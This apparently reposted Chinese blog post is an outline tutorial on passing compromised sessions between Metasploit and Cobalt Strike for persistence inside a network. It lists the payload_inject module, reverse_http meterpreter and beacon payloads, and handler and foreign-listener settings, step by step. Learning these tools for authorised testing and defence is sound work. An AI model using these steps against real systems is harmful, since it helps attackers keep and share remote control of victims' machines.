內網滲透 權限維持 - MSF與cs聯動


今天年初六
  • MSF和cs聯動

    • msf連接cs

      • 1.在隊伍服務器上啟動cs服務端

        • ./teamserver 團隊服務器ip 連接密碼
      • 2.cs客戶端連接攻擊機

        • 填團隊服務器ip和密碼,名字隨便
    • msf將session發往cs客戶端

      • 1.cs設置監聽

        • 監聽器 - add

          • 選擇payload類型和填攻擊機ip,端口要對應payload類型
      • 2.進入payload注入模塊

        • use exploit/windows/local/payload_inject
      • 3.設置參數

        • set disablepayloadhandler 1

          • 1開啟
        • set payload 第一步選的payload類型

          • 后面的協議類型一致
            示例:
            設置的payload是windows/meterpreter/reverse_http
            cs選擇的payload是windows/beacon_http/reverse_http
        • set lhost

          • msf本機ip
        • set lport

          • 與第一步對應
        • set session

          • 目標機的session id
      • 4.運行

        • run

          • cs即可收到session
        • exploit也可

          • -j 是隱藏到后台運行,jobs調出
          • -z 是連接后不進入終端
    • cs將shell轉發給另一msf

      最好用公網機器,內網機器要轉發端口

      • 1.進入handle模塊

      • 2.設置handle參數

        • set payload xxxxx

          • 全部要一致
        • set lhost

          • 本機
        • set lport

          • 任意一個,注意不要重復
      • 3.cs設置spwan

        • 1.add 新會話

        • 2.設置參數

          • msf所在對應的ip和端口
          • payload選foreign
        • 3.右鍵session,選擇派生會話

          • 選擇第二步設置的會話
      • 4.exploit 運行

        • 即可收到cs派生的session


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM